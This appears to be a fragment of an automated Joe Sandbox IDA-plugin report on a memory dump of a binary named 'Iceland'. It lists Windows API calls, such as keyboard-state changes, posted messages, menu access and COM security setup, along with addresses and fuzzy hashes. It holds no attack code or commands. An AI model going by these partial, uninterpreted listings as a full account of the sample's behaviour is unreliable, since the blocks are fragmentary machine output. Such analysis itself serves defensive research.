                                                                                                                                                                                                                                                                • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                • Opcode ID: f606500c0fdf7b1ea6d47d30e341d041273e63eaf666c6e207f5867816a7880c
                                                                                                                                                                                                                                                                • Instruction ID: 43fac02c48d997c1c0e96ed30920ae55141d6723990e9868dca1183c0b1898c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f606500c0fdf7b1ea6d47d30e341d041273e63eaf666c6e207f5867816a7880c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2011D235900115BFCB24F7649D4AEDE77ACEF45714F0001B9F505A60A2FE748A829750
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 952045576-0
                                                                                                                                                                                                                                                                • Opcode ID: f1c54b3a42dbba7ab58b2e7ac55b8b1c9cb12a786b0e502381bdc376a9644d8a
                                                                                                                                                                                                                                                                • Instruction ID: 025e99f00a2c4531e7bb8852e89524cbe94f66da099b5675a8acd70217938742
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1c54b3a42dbba7ab58b2e7ac55b8b1c9cb12a786b0e502381bdc376a9644d8a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7141B569C10515B9DB11FBF8CD86ACFB7ACAF45310F518862E508E3121FA34D261C7E6
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A639E2,00000004,00000000,00000000), ref: 00A3FC41
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00A639E2,00000004,00000000,00000000), ref: 00A7FC15
                                                                                                                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A639E2,00000004,00000000,00000000), ref: 00A7FC98
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ShowWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                • Opcode ID: 8333303c7d27dbc53477598a2ae06552bdfebb985cf5a2adf5186345c904afbb
                                                                                                                                                                                                                                                                • Instruction ID: 35a11e04eb30f81799c460732acd396fcb840bc7a66233694405eff732030032
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8333303c7d27dbc53477598a2ae06552bdfebb985cf5a2adf5186345c904afbb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4412630A683889EC7398B39CE98B7A7BA1AB46311F14D53CF94A46A71D631A881C711
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AB37B7
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00AB37BF
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AB37CA
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00AB37D6
                                                                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AB3812
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AB3823
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AB6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00AB385E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AB387D
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                • Opcode ID: e02c40c7a67c1283839666f69194fcceb79a7f90e5496f1bdc5428a58a05fccd
                                                                                                                                                                                                                                                                • Instruction ID: 8c803bdc8989482b1908aaa6124badf667ec29cd53c946d5b9161b96354071b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e02c40c7a67c1283839666f69194fcceb79a7f90e5496f1bdc5428a58a05fccd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08318D72201214BFEB158F94CC89FEB3FADEB49711F044165FE099A1A2D6B59841CBA0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                • API String ID: 0-572801152
                                                                                                                                                                                                                                                                • Opcode ID: ccc7bd2c8871e1481a771abc922c9c980afdd88afc9af6e98c38b5a2eab75838
                                                                                                                                                                                                                                                                • Instruction ID: 4d10cc4ae536934de684e1372c77c4b47d83a4da18d66b9194306ddf246857e0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccc7bd2c8871e1481a771abc922c9c980afdd88afc9af6e98c38b5a2eab75838
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18D1CB71E0060AAFDF10DFA8C885EAEB7B5FF49314F148569E905AB281E770ED41CB64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A61B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A6194E
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A619D1
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A61B7B,?,00A61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A61A64
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A61A7B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A46A79,?,0000015D,?,?,?,?,00A485B0,000000FF,00000000,?,?), ref: 00A53BC5
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A61AF7
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00A61B22
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00A61B2E
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A91C1B
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A91C43
                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00A91C67
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A91C97
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A91D1E
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A91D83
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A91DEF
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AA43C8
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AA44D7
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AA44E7
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AA467C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9169E: VariantInit.OLEAUT32(00000000), ref: 00A916DE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9169E: VariantCopy.OLEAUT32(?,?), ref: 00A916E7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9169E: VariantClear.OLEAUT32(?), ref: 00A916F3
                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A808FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?,?,00A80C4E), ref: 00A8091B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A808FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?), ref: 00A80936
                                                                                                                                                                                                                                                                  • Part of subcall function 00A808FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?), ref: 00A80944
                                                                                                                                                                                                                                                                  • Part of subcall function 00A808FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?), ref: 00A80954
                                                                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00AA56AE
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AA57B6
                                                                                                                                                                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00AA582C
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00AA5837
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                • Opcode ID: 36705b1ba575901e10a390bdbd003ac6fd54c106f61a23cd8d5b9f7d650a27cc
                                                                                                                                                                                                                                                                • Instruction ID: c864971049fc8210b0bba536d48c1ce3ecf2ea156179a39779c668a188085a45
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36705b1ba575901e10a390bdbd003ac6fd54c106f61a23cd8d5b9f7d650a27cc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61911671D00629EFDF14DFA4D980EEEBBB9BF08310F104569E915A7291EB359A44CFA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenu.USER32(?), ref: 00AB2C1F
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00AB2C51
                                                                                                                                                                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AB2C79
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB2CAF
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00AB2CE9
                                                                                                                                                                                                                                                                • GetSubMenu.USER32(?,?), ref: 00AB2CF7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A843AD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: GetCurrentThreadId.KERNEL32 ref: 00A843B4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A82F00), ref: 00A843BB
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AB2D7F
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8F292: Sleep.KERNEL32 ref: 00A8F30A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                • Opcode ID: 224efb20f2db91ab5ad26a58f94e845077c7191469cfca050f99a9c78f22d407
                                                                                                                                                                                                                                                                • Instruction ID: 413be2f9b1ab1a40e5cde2f848e6e8ad70844f019b2efc5a35c74d2d62f799a1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 224efb20f2db91ab5ad26a58f94e845077c7191469cfca050f99a9c78f22d407
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73718E75A00215AFCB14EF68C945BEEBBF5EF49310F14846AE816EB352DB34ED418B90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00AB8992
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00AB899E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00AB8A79
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00AB8AAC
                                                                                                                                                                                                                                                                • IsDlgButtonChecked.USER32(?,00000000), ref: 00AB8AE4
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 00AB8B06
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AB8B1E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                • Opcode ID: 0cbbf86ba1bb838f1587f1e53831ee7824dde73a70eb2d719ff29f80f1cafe28
                                                                                                                                                                                                                                                                • Instruction ID: 14264934d0c41ff380e35da67e5e133e06150ebfdaa20ea90fa5478b80d2c3a4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cbbf86ba1bb838f1587f1e53831ee7824dde73a70eb2d719ff29f80f1cafe28
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D718B74600204AFEF25DFA8C894FFABBBDEF09340F14045AE85567262DB39A981DB51
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00A8B8C0
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00A8B8D5
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00A8B936
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00A8B964
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00A8B983
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00A8B9C4
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A8B9E7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                • Opcode ID: 0b4348507f24bf9a1737400838dd8fb137855c40b723f95b0bda13933d75acf3
                                                                                                                                                                                                                                                                • Instruction ID: 2bb13947cc2566b319eee742435cd1618c1c3e3bdc446f05aeb0a76fd67fe51f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4348507f24bf9a1737400838dd8fb137855c40b723f95b0bda13933d75acf3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F51E1A0A287D53EFB3663348C59BBABEA95B06304F088589E1D5468D3D3D8ECC4D770
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(00000000), ref: 00A8B6E0
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00A8B6F5
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00A8B756
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A8B782
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A8B79F
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A8B7DE
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A8B7FF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                • Opcode ID: 274826b1102f9d50c03feb657e7125f910c283c709c4f05fc0a299af859b4064
                                                                                                                                                                                                                                                                • Instruction ID: 4228778ac89cb3cdcd496faa7478d0868c1e38d64be000db61f636cdb2044b73
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 274826b1102f9d50c03feb657e7125f910c283c709c4f05fc0a299af859b4064
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 275116A09687D53EFB32A374CC55B7ABEA85F45304F0C8589E1D54A8D2D394EC84D770
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00A55F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00A557E3
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 00A5585E
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 00A55879
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00A5589F
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,00A55F16,00000000,?,?,?,?,?,?,?,?,?,00A55F16,?), ref: 00A558BE
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,00A55F16,00000000,?,?,?,?,?,?,?,?,?,00A55F16,?), ref: 00A558F7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                • Opcode ID: 64083f0a6071c6cfa172ea50ef984aec5bd203637d735fb16c70617fc8e6817f
                                                                                                                                                                                                                                                                • Instruction ID: c66c8e5639f996793f7ff9d42749ecfedc827ad6ac5edb86a594568fe15497da
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64083f0a6071c6cfa172ea50ef984aec5bd203637d735fb16c70617fc8e6817f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06518E71E00649DFDB10CFA8D895AEEBBF8FF08311F14415AE955E7291E7309945CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A430BB
                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00A430C3
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A43151
                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00A4317C
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A431D1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
